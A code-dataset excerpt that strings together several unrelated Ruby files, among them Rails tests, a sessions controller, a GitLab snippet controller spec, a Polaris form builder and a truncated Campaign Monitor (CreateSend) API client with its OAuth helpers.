hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = YNAB.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.331579 | 277 | 0.625695 |
91756df754bd4c55d61412f67a680914f8a43272 | 657 | module Fog
module Cloudstack
class Compute
class Real
# Create a virtual router element.
#
# {CloudStack API Reference}[http://cloudstack.apache.org/docs/api/apidocs-4.4/root_admin/createVirtualRouterElement.html]
#
# Accepts either an options Hash (forwarded to the API) or a single
# positional argument interpreted as the 'nspid'.
def create_virtual_router_element(*args)
  options =
    if args[0].is_a?(Hash)
      # Merge into a copy so the caller's hash is never mutated
      # (the previous implementation merge!'d into the argument).
      args[0].merge('command' => 'createVirtualRouterElement')
    else
      { 'command' => 'createVirtualRouterElement',
        'nspid'   => args[0] }
    end
  request(options)
end
end
end
end
end
| 25.269231 | 130 | 0.578387 |
7a82c106b1c8a10ab8f53eaa973e21ff67237675 | 512 | require('rspec')
require('hangman')
describe(Hangman) do
  describe('#answer') do
    it("gives a six letter answer") do
      # The answer is exposed as an array of individual letters.
      game = Hangman.new(answer: "horses")
      expect(game.answer).to eq(["h", "o", "r", "s", "e", "s"])
    end
  end

  describe('#user_guess') do
    it("checks to see if the letter is in the answer") do
      game = Hangman.new(answer: "horses")
      guessed_letter = "h"
      # Matching positions are revealed; all others stay blank.
      expect(game.user_guess(guessed_letter)).to eq(["h", "_", "_", "_", "_", "_"])
    end
  end
end
| 24.380952 | 81 | 0.583984 |
d54e3d21f324b396c8c0abcb37b3eeb698b05a1d | 1,458 | require 'spec_helper'
describe "Uploads" do
  if Settings.file_uploads_engine != :carrierwave
    pending "paperclip not detected, skipped. To run use UPLOADS=carrierwave rspec"
  else
    before :each do
      # Remove any upload left over from a previous example so each
      # run starts from a clean slate.
      f = "#{File.dirname(__FILE__)}/../uploads/1024x768.gif"
      if File.file?(f)
        File.unlink(f)
      end
    end
    it 'supports file kind' do
      Settings.set('file', File.open("#{File.dirname(__FILE__)}/support/1024x768.gif"), kind: 'file')
      # because we're not inside Rails
      Settings.get(:file).file.root = '/'
      expect(Settings.get(:file).file.file.file).to eq "#{File.dirname(__FILE__).gsub('/spec', '/')}uploads/1024x768.gif"
      expect(File.exists?(Settings.root_file_path.join("uploads/1024x768.gif"))).to be_truthy
    end
    it 'supports image kind' do
      Settings.set('file', File.open("#{File.dirname(__FILE__)}/support/1024x768.gif"), kind: 'image')
      # because we're not inside Rails
      Settings.get(:file).file.root = '/'
      expect(Settings.get(:file).file.file.file).to eq "#{File.dirname(__FILE__).gsub('/spec', '/')}uploads/1024x768.gif"
      expect(File.exists?(Settings.root_file_path.join("uploads/1024x768.gif"))).to be_truthy
    end
    it 'supports defaults' do
      # Applying a defaults YAML that references a file should copy the
      # file into the uploads directory as well.
      Settings.apply_defaults!(File.join(File.dirname(__FILE__), 'support/defaults_w_file.yml'))
      expect(File.exists?(Settings.root_file_path.join("uploads/1024x768.gif"))).to be_truthy
    end
  end
end
| 34.714286 | 121 | 0.673525 |
4a74b122a360c8d8421e238cbe0e0593b6a6593f | 2,079 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2020_09_10_092756) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"
  # Interest tags; linked to penpals through penpal_interests below.
  create_table "interests", force: :cascade do |t|
    t.string "name"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
  # Letters exchanged between a user and a penpal (plain integer FKs,
  # no DB-level foreign-key constraints).
  create_table "letters", force: :cascade do |t|
    t.string "title"
    t.string "message"
    t.integer "user_id"
    t.integer "penpal_id"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
  # Join table between penpals and interests.
  create_table "penpal_interests", force: :cascade do |t|
    t.integer "interest_id"
    t.integer "penpal_id"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
  create_table "penpals", force: :cascade do |t|
    t.string "first_name"
    t.string "last_name"
    t.integer "age"
    t.string "frequency"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
  create_table "users", force: :cascade do |t|
    t.string "username"
    t.string "fb_name"
    t.integer "fb_id"
    t.string "password_digest"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
end
| 35.237288 | 86 | 0.720539 |
1c57c35cac0688f38994f8deecb1e019aafc2501 | 1,770 | require 'test_helper'
class UsersEditTest < ActionDispatch::IntegrationTest
  def setup
    @user = users(:michael)
  end
  # Submitting invalid data (blank name, malformed email, mismatched
  # short passwords) should re-render the edit form.
  test "unsuccessful edit" do
    log_in_as(@user)
    get edit_user_path(@user)
    assert_template 'users/edit'
    patch user_path(@user), params: { user: { name: "",
                                              email: "foo@invalid",
                                              password: "foo",
                                              password_confirmation: "bar" } }
    assert_template 'users/edit'
  end
  # Blank password fields mean "keep the current password"; a valid
  # name/email update should flash, redirect, and persist.
  test "successful edit" do
    log_in_as(@user)
    get edit_user_path(@user)
    assert_template 'users/edit'
    name = "Foo Bar"
    email = "[email protected]"
    patch user_path(@user), params: { user: { name: name,
                                              email: email,
                                              password: "",
                                              password_confirmation: "" } }
    assert_not flash.empty?
    assert_redirected_to @user
    @user.reload
    assert_equal name, @user.name
    assert_equal email, @user.email
  end
  # Visiting the edit page before logging in should redirect back to
  # that page after login (friendly forwarding), then behave as above.
  test "successful edit with friendly forwarding" do
    get edit_user_path(@user)
    log_in_as(@user)
    assert_redirected_to edit_user_url(@user)
    name = "Foo Bar"
    email = "[email protected]"
    patch user_path(@user), params: { user: { name: name,
                                              email: email,
                                              password: "",
                                              password_confirmation: "" } }
    assert_not flash.empty?
    assert_redirected_to @user
    @user.reload
    assert_equal name, @user.name
    assert_equal email, @user.email
  end
end
| 31.607143 | 78 | 0.50113 |
1107b28f3fe9bc717cbd860a02988ab8c7cdd72c | 885 | #
# SmartRails
# Ruby on Rails Project
# (C) Alessio Saltarin 2021
# MIT License
#
class SessionsController < ApplicationController
  #
  # Called on Login GET
  #
  def new
    logger.info('Sessions controller - new')
  end

  #
  # Create new session: called on Login POST
  #
  # Looks up the user by username and, when the password matches,
  # stores the user id in the session and redirects to the home page.
  # Otherwise re-renders the login form with @errors set.
  #
  def create
    @errors = false
    # Interpolation instead of '+' concatenation: concatenating a
    # missing (nil) :username param would raise a TypeError.
    logger.info("Sessions controller - create new session for user #{params[:username]}")
    @user = User.find_by(username: params[:username])
    if @user&.authenticate(params[:password])
      session[:user_id] = @user.id
      redirect_to '/home/home'
    else
      @errors = true
      render :new
    end
  end

  #
  # Called on Logout GET
  #
  # Clears the session user id (when logged in) and always redirects
  # to the welcome page.
  #
  def logout
    logger.info('Sessions controller - logout')
    if logged_in?
      logger.info("Logging out #{current_user.username}")
      session[:user_id] = nil
    end
    redirect_to '/welcome/index'
  end
end
| 19.23913 | 89 | 0.647458 |
793ffbbfad9605b4569bba960be32d0ba3ca8eca | 8,531 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Projects::SnippetsController do
  include Gitlab::Routing
  let_it_be(:user) { create(:user) }
  let_it_be(:other_user) { create(:user) }
  let_it_be(:project) { create(:project_empty_repo, :public) }
  before do
    # user is a maintainer, other_user a developer — both project members.
    project.add_maintainer(user)
    project.add_developer(other_user)
  end
  # Listing snippets: pagination, counts, sorting, and visibility rules.
  describe 'GET #index' do
    let(:base_params) do
      {
        namespace_id: project.namespace,
        project_id: project
      }
    end
    subject { get :index, params: base_params }
    it_behaves_like 'paginated collection' do
      let(:collection) { project.snippets }
      let(:params) { base_params }
      before do
        create(:project_snippet, :public, project: project, author: user)
      end
    end
    it 'fetches snippet counts via the snippet count service' do
      service = double(:count_service, execute: {})
      expect(Snippets::CountService)
        .to receive(:new).with(nil, project: project)
        .and_return(service)
      subject
    end
    it_behaves_like 'snippets sort order' do
      let(:params) { base_params }
    end
    # Private snippets are hidden from anonymous users but visible to
    # the author and to project members.
    context 'when the project snippet is private' do
      let_it_be(:project_snippet) { create(:project_snippet, :private, project: project, author: user) }
      context 'when anonymous' do
        it 'does not include the private snippet' do
          subject
          expect(assigns(:snippets)).not_to include(project_snippet)
          expect(response).to have_gitlab_http_status(:ok)
        end
      end
      context 'when signed in as the author' do
        it 'renders the snippet' do
          sign_in(user)
          subject
          expect(assigns(:snippets)).to include(project_snippet)
          expect(response).to have_gitlab_http_status(:ok)
        end
      end
      context 'when signed in as a project member' do
        it 'renders the snippet' do
          sign_in(other_user)
          subject
          expect(assigns(:snippets)).to include(project_snippet)
          expect(response).to have_gitlab_http_status(:ok)
        end
      end
    end
  end
  describe 'POST #mark_as_spam' do
    let_it_be(:snippet) { create(:project_snippet, :private, project: project, author: user) }
    before do
      # Stub Akismet so no external call is made.
      allow_next_instance_of(Spam::AkismetService) do |instance|
        allow(instance).to receive_messages(submit_spam: true)
      end
      stub_application_setting(akismet_enabled: true)
    end
    def mark_as_spam
      admin = create(:admin)
      create(:user_agent_detail, subject: snippet)
      project.add_maintainer(admin)
      sign_in(admin)
      post :mark_as_spam,
           params: {
             namespace_id: project.namespace,
             project_id: project,
             id: snippet.id
           }
    end
    it 'updates the snippet' do
      mark_as_spam
      expect(snippet.reload).not_to be_submittable_as_spam
    end
  end
  shared_examples 'successful response' do
    it 'renders the snippet' do
      subject
      expect(assigns(:snippet)).to eq(project_snippet)
      expect(response).to have_gitlab_http_status(:ok)
    end
  end
  # #show and #raw share the same authorization behavior.
  %w[show raw].each do |action|
    describe "GET ##{action}" do
      context 'when the project snippet is private' do
        let_it_be(:project_snippet) { create(:project_snippet, :private, :repository, project: project, author: user) }
        subject { get action, params: { namespace_id: project.namespace, project_id: project, id: project_snippet.to_param } }
        context 'when anonymous' do
          it 'responds with status 404' do
            subject
            expect(response).to have_gitlab_http_status(:not_found)
          end
        end
        context 'when signed in as the author' do
          before do
            sign_in(user)
          end
          it_behaves_like 'successful response'
        end
        context 'when signed in as a project member' do
          before do
            sign_in(other_user)
          end
          it_behaves_like 'successful response'
        end
      end
      context 'when the project snippet does not exist' do
        subject { get action, params: { namespace_id: project.namespace, project_id: project, id: 42 } }
        context 'when anonymous' do
          it 'responds with status 404' do
            subject
            expect(response).to have_gitlab_http_status(:not_found)
          end
        end
        context 'when signed in' do
          before do
            sign_in(user)
          end
          it 'responds with status 404' do
            subject
            expect(response).to have_gitlab_http_status(:not_found)
          end
        end
      end
    end
  end
  describe "GET #show for embeddable content" do
    let(:project_snippet) { create(:project_snippet, :repository, snippet_permission, project: project, author: user) }
    let(:extra_params) { {} }
    before do
      sign_in(user)
    end
    subject { get :show, params: { namespace_id: project.namespace, project_id: project, id: project_snippet.to_param, **extra_params }, format: :js }
    context 'when snippet is private' do
      let(:snippet_permission) { :private }
      it 'responds with status 404' do
        subject
        expect(response).to have_gitlab_http_status(:not_found)
      end
    end
    context 'when snippet is public' do
      let(:snippet_permission) { :public }
      it 'renders the blob from the repository' do
        subject
        expect(assigns(:snippet)).to eq(project_snippet)
        expect(assigns(:blobs).map(&:name)).to eq(project_snippet.blobs.map(&:name))
        expect(response).to have_gitlab_http_status(:ok)
      end
      it 'does not show the blobs expanded by default' do
        subject
        expect(assigns(:blobs).map(&:expanded?)).to be_all(false)
      end
      context 'when param expanded is set' do
        let(:extra_params) { { expanded: true } }
        it 'shows all blobs expanded' do
          subject
          expect(assigns(:blobs).map(&:expanded?)).to be_all(true)
        end
      end
    end
    # A public snippet in a private project is still not embeddable.
    context 'when the project is private' do
      let(:project) { create(:project_empty_repo, :private) }
      context 'when snippet is public' do
        let(:project_snippet) { create(:project_snippet, :public, project: project, author: user) }
        it 'responds with status 404' do
          subject
          expect(assigns(:snippet)).to eq(project_snippet)
          expect(response).to have_gitlab_http_status(:not_found)
        end
      end
    end
  end
  describe 'GET #raw' do
    let(:inline) { nil }
    let(:line_ending) { nil }
    let(:params) do
      {
        namespace_id: project.namespace,
        project_id: project,
        id: project_snippet.to_param,
        inline: inline,
        line_ending: line_ending
      }
    end
    subject { get :raw, params: params }
    context 'when repository is empty' do
      let_it_be(:content) { "first line\r\nsecond line\r\nthird line" }
      let_it_be(:project_snippet) do
        create(
          :project_snippet, :public, :empty_repo,
          project: project,
          author: user,
          content: content
        )
      end
      let(:formatted_content) { content.gsub(/\r\n/, "\n") }
      context 'CRLF line ending' do
        before do
          allow_next_instance_of(Blob) do |instance|
            allow(instance).to receive(:data).and_return(content)
          end
        end
        it 'returns LF line endings by default' do
          subject
          expect(response.body).to eq(formatted_content)
        end
        context 'when line_ending parameter present' do
          let(:line_ending) { :raw }
          it 'does not convert line endings' do
            subject
            expect(response.body).to eq(content)
          end
        end
      end
    end
    context 'when repository is not empty' do
      let_it_be(:project_snippet) do
        create(
          :project_snippet, :public, :repository,
          project: project,
          author: user
        )
      end
      it 'sends the blob' do
        # Raw delivery is delegated to Workhorse via send-data headers.
        subject
        expect(response).to have_gitlab_http_status(:ok)
        expect(response.header[Gitlab::Workhorse::SEND_DATA_HEADER]).to start_with('git-blob:')
        expect(response.header[Gitlab::Workhorse::DETECT_HEADER]).to eq 'true'
      end
      it_behaves_like 'project cache control headers'
      it_behaves_like 'content disposition headers'
    end
  end
end
| 26.493789 | 150 | 0.619974 |
28d7ab7ecabe91430de9bb0c218a225d9aa63ea1 | 4,555 | require 'minitest_helper'
describe Fog::Compute::XenServer::Models::StorageRepository do
  let(:storage_repository_class) do
    # Reopen the model class to expose its @identity class instance
    # variable, which is otherwise not readable from the spec.
    class Fog::Compute::XenServer::Models::StorageRepository
      def self.read_identity
        instance_variable_get('@identity')
      end
    end
    Fog::Compute::XenServer::Models::StorageRepository
  end
  it 'should associate to a provider class' do
    storage_repository_class.provider_class.must_equal('SR')
  end
  it 'should have a collection name' do
    storage_repository_class.collection_name.must_equal(:storage_repositories)
  end
  it 'should have an unique id' do
    storage_repository_class.read_identity.must_equal(:reference)
  end
  it 'should have 18 attributes' do
    storage_repository_class.attributes.must_equal([ :reference,
                                                     :allowed_operations,
                                                     :blobs,
                                                     :content_type,
                                                     :current_operations,
                                                     :description,
                                                     :introduced_by,
                                                     :local_cache_enabled,
                                                     :name,
                                                     :other_config,
                                                     :physical_size,
                                                     :physical_utilisation,
                                                     :shared,
                                                     :sm_config,
                                                     :tags,
                                                     :type,
                                                     :uuid,
                                                     :virtual_allocation ])
  end
  it 'should have 2 associations' do
    storage_repository_class.associations.must_equal(:pbds => :pbds,
                                                     :vdis => :vdis)
  end
  # Masks map model attribute names to the XenServer API field names.
  it 'should have 20 masks' do
    storage_repository_class.masks.must_equal(:reference => :reference,
                                              :allowed_operations => :allowed_operations,
                                              :blobs => :blobs,
                                              :content_type => :content_type,
                                              :current_operations => :current_operations,
                                              :description => :description,
                                              :introduced_by => :introduced_by,
                                              :local_cache_enabled => :local_cache_enabled,
                                              :name => :name,
                                              :other_config => :other_config,
                                              :physical_size => :physical_size,
                                              :physical_utilisation => :physical_utilisation,
                                              :shared => :shared,
                                              :sm_config => :sm_config,
                                              :tags => :tags,
                                              :type => :type,
                                              :uuid => :uuid,
                                              :virtual_allocation => :virtual_allocation,
                                              :pbds => :PBDs,
                                              :vdis => :VDIs)
  end
  it 'should have 4 aliases' do
    storage_repository_class.aliases.must_equal(:name_label => :name,
                                                :name_description => :description,
                                                :PBDs => :pbds,
                                                :VDIs => :vdis)
  end
  it 'should have 5 default values' do
    storage_repository_class.default_values.must_equal(:content_type => 'user',
                                                       :shared => false,
                                                       :description => '',
                                                       :physical_size => '0',
                                                       :sm_config => {})
  end
  it 'should require 2 attributes before save' do
    storage_repository_class.require_before_save.must_equal([ :name, :type ])
  end
end
bb30605d7103a6c6e96739bb0f94c22c57d59000 | 385 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataMigration::Mgmt::V2017_11_15_preview
  module Models
    #
    # Defines values for ResourceSkuRestrictionsType
    #
    # Auto-generated enum-style module; each constant is a wire value.
    module ResourceSkuRestrictionsType
      # Restriction applies to a location.
      Location = "location"
    end
  end
end
386a7705104a4a797325a117229b957a1d783bb0 | 851 | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
# Follow redirects (-L) and verify the Matomo welcome page is served.
describe command('curl -L http://localhost/') do
  its(:stdout) { should match /<h2>Welcome<\/h2>/ }
  its(:stdout) { should match /<p>Matomo is libre software used to analyze traffic from your visitors.<\/p>/ }
  its(:exit_status) { should eq 0 }
end
| 38.681818 | 110 | 0.73678 |
bfcd3ff1cf11a3ff61dbfea88cb6b865fd2153e9 | 2,782 | module Polaris
class FormBuilder < ActionView::Helpers::FormBuilder
  include ActionView::Helpers::OutputSafetyHelper

  attr_reader :template

  delegate :render, :pluralize, to: :template

  # Renders a critical banner listing every validation error on the
  # form's object. Returns nil when there is no object or no errors.
  def errors_summary
    return if object.blank?
    return unless object.errors.any?
    model_name = object.class.model_name.human.downcase
    render Polaris::BannerComponent.new(
      title: "There's #{pluralize(object.errors.count, "error")} with this #{model_name}:",
      status: :critical
    ) do
      render(Polaris::ListComponent.new) do |list|
        object.errors.full_messages.each do |error|
          list.item { error.html_safe }
        end
      end
    end
  end

  # First full error message for +method+, or nil when the object is
  # missing or the attribute has no errors.
  def error_for(method)
    return if object.blank?
    return unless object.errors.key?(method)
    raw object.errors.full_messages_for(method)&.first
  end

  def polaris_inline_error_for(method, **options, &block)
    error_message = error_for(method)
    return unless error_message
    render(Polaris::InlineErrorComponent.new(**options, &block)) do
      error_message
    end
  end

  def polaris_text_field(method, **options, &block)
    apply_error_option(method, options)
    render Polaris::TextFieldComponent.new(form: self, attribute: method, **options, &block)
  end

  def polaris_select(method, **options, &block)
    apply_error_option(method, options)
    value = object&.public_send(method)
    if value.present?
      options[:selected] = value
    end
    render Polaris::SelectComponent.new(form: self, attribute: method, **options, &block)
  end

  def polaris_check_box(method, **options, &block)
    apply_error_option(method, options)
    render Polaris::CheckboxComponent.new(form: self, attribute: method, **options, &block)
  end

  def polaris_radio_button(method, **options, &block)
    apply_error_option(method, options)
    render Polaris::RadioButtonComponent.new(form: self, attribute: method, **options, &block)
  end

  def polaris_dropzone(method, **options, &block)
    apply_error_option(method, options)
    render Polaris::DropzoneComponent.new(form: self, attribute: method, **options, &block)
  end

  private

  # Shared error plumbing for all field helpers (previously duplicated
  # in each one): default :error to the attribute's message, then
  # collapse it to a boolean when :error_hidden asks for the message
  # to be suppressed while still flagging the field as errored.
  def apply_error_option(method, options)
    options[:error] ||= error_for(method)
    options[:error] = !!options[:error] if options[:error_hidden] && options[:error]
  end
end
| 31.613636 | 96 | 0.649173 |
7922c0553d38d29ebefa1a856561ff732fd0366c | 464 | # # encoding: utf-8
# Inspec test for recipe sudo::panavaserver3
# The Inspec reference, with examples and extensive documentation, can be
# found at http://inspec.io/docs/reference/resources/
unless os.windows?
  # This is an example test, replace with your own test.
  # :skip keeps the example in the report without executing it.
  describe user('root'), :skip do
    it { should exist }
  end
end
# This is an example test, replace it with your own test.
describe port(80), :skip do
  it { should_not be_listening }
end
| 24.421053 | 73 | 0.724138 |
6a7d6f203b5a7951a5c6bd6a2bb3b05ccd513758 | 1,023 | require File.expand_path(File.dirname(__FILE__) + '/../test_helper')
class EmailAfterBeingDeliveredTest < ActiveSupport::TestCase
  def setup
    # Start from an empty delivery queue so the assertions below only
    # see the email created by this test.
    ActionMailer::Base.deliveries = []
    @email = new_email(
      :subject => 'Hello',
      :body => 'How are you?',
      :sender => create_email_address(:spec => 'webmaster@localhost'),
      :to => create_email_address(:spec => 'partners@localhost'),
      :cc => create_email_address(:spec => 'support@localhost'),
      :bcc => create_email_address(:spec => 'feedback@localhost')
    )
    assert @email.deliver
  end
  # The delivered mail must carry the subject, body and every
  # recipient field configured in #setup.
  def test_should_send_mail
    assert ActionMailer::Base.deliveries.any?
    delivery = ActionMailer::Base.deliveries.first
    assert_equal 'Hello', delivery.subject
    assert_equal 'How are you?', delivery.body
    assert_equal ['webmaster@localhost'], delivery.from
    assert_equal ['partners@localhost'], delivery.to
    assert_equal ['support@localhost'], delivery.cc
    assert_equal ['feedback@localhost'], delivery.bcc
  end
end
| 34.1 | 70 | 0.68915 |
1cfd643480cab7aaf289805e85dc07aa9cbb542a | 9,981 | require 'cgi'
require 'uri'
require 'httparty'
require 'hashie'
require 'json'
module CreateSend
USER_AGENT_STRING = "createsend-ruby-#{VERSION}-#{RUBY_VERSION}-p#{RUBY_PATCHLEVEL}-#{RUBY_PLATFORM}"
# Represents a CreateSend API error. Contains specific data about the error.
class CreateSendError < StandardError
  # The parsed API error payload (responds to Code, Message and,
  # optionally, ResultData).
  attr_reader :data
  def initialize(data)
    @data = data
    # @data should contain Code, Message and optionally ResultData
    extra = @data.ResultData ? "\nExtra result data: #{@data.ResultData}" : ""
    super "The CreateSend API responded with the following error"\
      " - #{@data.Code}: #{@data.Message}#{extra}"
  end
end
# Error hierarchy raised by CreateSend#handle_response, keyed off the
# HTTP status (and, for 401s, the API error Code in the body).
# Raised for HTTP response codes of 400...500
class ClientError < StandardError; end
# Raised for HTTP response codes of 500...600
class ServerError < StandardError; end
# Raised for HTTP response code of 400
class BadRequest < CreateSendError; end
# Raised for HTTP response code of 401
class Unauthorized < CreateSendError; end
# Raised for HTTP response code of 404
class NotFound < ClientError; end
# Raised for HTTP response code of 401, specifically when an OAuth token
# in invalid (Code: 120, Message: 'Invalid OAuth Token')
class InvalidOAuthToken < Unauthorized; end
# Raised for HTTP response code of 401, specifically when an OAuth token
# has expired (Code: 121, Message: 'Expired OAuth Token')
class ExpiredOAuthToken < Unauthorized; end
# Raised for HTTP response code of 401, specifically when an OAuth token
# has been revoked (Code: 122, Message: 'Revoked OAuth Token')
class RevokedOAuthToken < Unauthorized; end
# Provides high level CreateSend functionality/data you'll probably need.
class CreateSend
include HTTParty
attr_reader :auth_details
# Specify cert authority file for cert validation
ssl_ca_file File.expand_path(File.join(File.dirname(__FILE__), 'cacert.pem'))
# Set a custom user agent string to be used when instances of
# CreateSend::CreateSend make API calls.
#
# user_agent - The user agent string to use in the User-Agent header when
# instances of this class make API calls. If set to nil, the
# default value of CreateSend::USER_AGENT_STRING will be used.
def self.user_agent(user_agent)
headers({'User-Agent' => user_agent || USER_AGENT_STRING})
end
# Get the authorization URL for your application, given the application's
# client_id, redirect_uri, scope, and optional state data.
def self.authorize_url(client_id, redirect_uri, scope, state=nil)
  # Build the query string in a fixed order; state is only appended
  # when supplied.
  pairs = [
    ["client_id", client_id],
    ["redirect_uri", redirect_uri],
    ["scope", scope]
  ]
  pairs << ["state", state] if state
  query = pairs.map { |key, value| "#{key}=#{CGI.escape(value.to_s)}" }.join("&")
  "#{@@oauth_base_uri}?#{query}"
end
# Exchange a provided OAuth code for an OAuth access token, 'expires in'
# value, and refresh token.
#
# @param client_id [String] the application's OAuth client id
# @param client_secret [String] the application's OAuth client secret
# @param redirect_uri [String] the redirect URI registered for the app
# @param code [String] the authorization code being exchanged
# @return [Array] [access_token, expires_in, refresh_token]
# @raise [RuntimeError] when the token endpoint returns an error payload
def self.exchange_token(client_id, client_secret, redirect_uri, code)
  body = "grant_type=authorization_code"
  body << "&client_id=#{CGI.escape(client_id.to_s)}"
  body << "&client_secret=#{CGI.escape(client_secret.to_s)}"
  body << "&redirect_uri=#{CGI.escape(redirect_uri.to_s)}"
  body << "&code=#{CGI.escape(code.to_s)}"
  options = {:body => body}
  response = HTTParty.post(@@oauth_token_uri, options)
  if response.has_key? 'error' and response.has_key? 'error_description'
    err = "Error exchanging code for access token: "
    err << "#{response['error']} - #{response['error_description']}"
    raise err
  end
  r = Hashie::Mash.new(response)
  [r.access_token, r.expires_in, r.refresh_token]
end
# Refresh an OAuth access token, given an OAuth refresh token.
# Returns a new access token, 'expires in' value, and refresh token.
#
# @param refresh_token [String] the refresh token issued previously
# @return [Array] [access_token, expires_in, refresh_token]
# @raise [RuntimeError] when the token endpoint returns an error payload
def self.refresh_access_token(refresh_token)
  options = {
    :body => "grant_type=refresh_token&refresh_token=#{CGI.escape(refresh_token)}" }
  response = HTTParty.post(@@oauth_token_uri, options)
  if response.has_key? 'error' and response.has_key? 'error_description'
    err = "Error refreshing access token: "
    err << "#{response['error']} - #{response['error_description']}"
    raise err
  end
  r = Hashie::Mash.new(response)
  [r.access_token, r.expires_in, r.refresh_token]
end
# Optionally authenticate on construction.
#
# @param args [Array] when present, args[0] is an auth hash accepted
#   by #auth (either :api_key, or :access_token/:refresh_token).
def initialize(*args)
  if args.size > 0
    auth args.first # Expect auth details as first argument
  end
end
@@base_uri = "https://api.createsend.com/api/v3.2"
@@oauth_base_uri = "https://api.createsend.com/oauth"
@@oauth_token_uri = "#{@@oauth_base_uri}/token"
headers({
'User-Agent' => USER_AGENT_STRING,
'Content-Type' => 'application/json; charset=utf-8'
})
base_uri @@base_uri
# Authenticate using either OAuth or an API key.
def auth(auth_details)
@auth_details = auth_details
end
# Refresh the current OAuth token using the current refresh token.
# On success the stored auth details are replaced with the new pair.
def refresh_token
  existing = @auth_details && @auth_details[:refresh_token]
  unless existing
    raise '@auth_details[:refresh_token] does not contain a refresh token.'
  end
  access_token, expires_in, new_refresh_token =
    self.class.refresh_access_token(existing)
  auth(
    :access_token => access_token,
    :refresh_token => new_refresh_token)
  [access_token, expires_in, new_refresh_token]
end
# Gets your clients.
# @return [Array<Hashie::Mash>] one entry per client
def clients
  response = get('/clients.json')
  response.map{|item| Hashie::Mash.new(item)}
end
# Get your billing details.
def billing_details
  response = get('/billingdetails.json')
  Hashie::Mash.new(response)
end
# Gets valid countries.
def countries
  response = get('/countries.json')
  response.parsed_response
end
# Gets the current date in your account's timezone.
def systemdate
  response = get('/systemdate.json')
  Hashie::Mash.new(response)
end
# Gets valid timezones.
def timezones
  response = get('/timezones.json')
  response.parsed_response
end
# Gets the administrators for the account.
def administrators
  response = get('/admins.json')
  response.map{|item| Hashie::Mash.new(item)}
end
# Gets the primary contact for the account.
def get_primary_contact
  response = get('/primarycontact.json')
  Hashie::Mash.new(response)
end
# Set the primary contect for the account.
def set_primary_contact(email)
  options = { :query => { :email => email } }
  response = put("/primarycontact.json", options)
  Hashie::Mash.new(response)
end
# Get a URL which initiates a new external session for the user with the
# given email.
# Full details: http://www.campaignmonitor.com/api/account/#single_sign_on
#
# email         - The email address of the Campaign Monitor user for whom
#                 the login session should be created.
# chrome        - Which 'chrome' to display - Must be either "all",
#                 "tabs", or "none".
# url           - The URL to display once logged in. e.g. "/subscribers/"
# integrator_id - The integrator ID. You need to contact Campaign Monitor
#                 support to get an integrator ID.
# client_id     - The Client ID of the client which should be active once
#                 logged in to the Campaign Monitor account.
#
# Returns An object containing a single field SessionUrl which represents
# the URL to initiate the external Campaign Monitor session.
def external_session_url(email, chrome, url, integrator_id, client_id)
  options = { :body => {
    :Email => email,
    :Chrome => chrome,
    :Url => url,
    :IntegratorID => integrator_id,
    :ClientID => client_id }.to_json }
  response = put("/externalsession.json", options)
  Hashie::Mash.new(response)
end
# HTTP verb wrappers. Each injects the stored auth details into the
# request options (see #add_auth_details_to_options), delegates to the
# corresponding HTTParty class method, and converts error responses
# into typed exceptions via #handle_response. The cs_* aliases provide
# unambiguous alternative names for the same methods.
def get(*args)
  args = add_auth_details_to_options(args)
  handle_response CreateSend.get(*args)
end
alias_method :cs_get, :get
def post(*args)
  args = add_auth_details_to_options(args)
  handle_response CreateSend.post(*args)
end
alias_method :cs_post, :post
def put(*args)
  args = add_auth_details_to_options(args)
  handle_response CreateSend.put(*args)
end
alias_method :cs_put, :put
def delete(*args)
  args = add_auth_details_to_options(args)
  handle_response CreateSend.delete(*args)
end
alias_method :cs_delete, :delete
# Injects the stored auth details into an HTTParty argument array.
#
# args[1] is the HTTParty options hash (created if absent). With
# :access_token it gains a Bearer Authorization header; with :api_key
# it gains HTTP Basic credentials (API key as username, 'x' as
# password) unless :basic_auth was already provided by the caller.
#
# NOTE(review): mutates the options hash in place when one was passed.
def add_auth_details_to_options(args)
  if @auth_details
    options = {}
    if args.size > 1
      options = args[1]
    end
    if @auth_details.has_key? :access_token
      options[:headers] = {
